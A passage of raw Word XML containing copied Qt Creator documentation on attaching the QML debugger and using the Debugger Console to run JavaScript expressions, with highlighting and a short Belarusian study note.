        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmljsdebugger=port:&lt;port&gt;[,host:&lt;ip address&gt;][,block]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Where</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(mandatory) specifies the debugging port,</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip address</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(optional) specifies the IP address of the host where the application is running, and</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(optional) prevents the application from running until the debug client connects to the server. </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>This enables debugging from the start.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debug &gt; Start Debugging &gt; Attach to QML Port</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Choose the kit configured for the device where the application to be debugged is running. The port number to use is displayed in the standard output when the application starts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB71E8" w:rsidRPr="00DB71E8" w:rsidRDefault="00DB71E8" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>я так разумею, можна падключацца да ўжо гуляючых прылажэнняў. Паразважаць.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="00DB71E8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2771" w:name="debugging-javascript-functions"/>
      <w:bookmarkStart w:id="2772" w:name="_Toc483604475"/>
      <w:bookmarkStart w:id="2773" w:name="_Toc483605695"/>
      <w:bookmarkEnd w:id="2771"/>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugging JavaScript Functions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2772"/>
      <w:bookmarkEnd w:id="2773"/>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00DB71E8" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You can use the Qt Creator</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8" w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8" w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mode to inspect the state of your application while debugging. You can interact with the debugger by:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00DB71E8" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3026" w:anchor="setting-breakpoints" w:history="1">
        <w:r w:rsidRPr="00DB71E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Setting breakpoints</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00DB71E8" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3027" w:anchor="viewing-call-stack-trace" w:history="1">
        <w:r w:rsidRPr="00DB71E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Viewing call stack trace</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00DB71E8" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3028" w:anchor="locals-and-expressions" w:history="1">
        <w:r w:rsidRPr="00DB71E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Viewing locals and expressions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="00DB71E8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2774" w:name="executing-javascript-expressions"/>
      <w:bookmarkStart w:id="2775" w:name="_Toc483604476"/>
      <w:bookmarkStart w:id="2776" w:name="_Toc483605696"/>
      <w:bookmarkEnd w:id="2774"/>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Executing JavaScript Expressions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2775"/>
      <w:bookmarkEnd w:id="2776"/>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00DB71E8" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When the application is interrupted by a breakpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, you </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can use the</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8" w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger Console</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8" w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to execute JavaScript expressions in the current context</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To open it, choose</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Window</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Output Panes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger Console</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qtcreator/images/qml-script-console.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1083" type="#_x0000_t75" alt="&quot;Debugger Console&quot;" style="width:352.5pt;height:156.65pt">
            <v:imagedata r:id="rId3029" r:href="rId3030"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>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color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For more information about using the console, see</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3031" w:anchor="debugger-console" w:history="1">
        <w:r w:rsidRPr="003613F0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
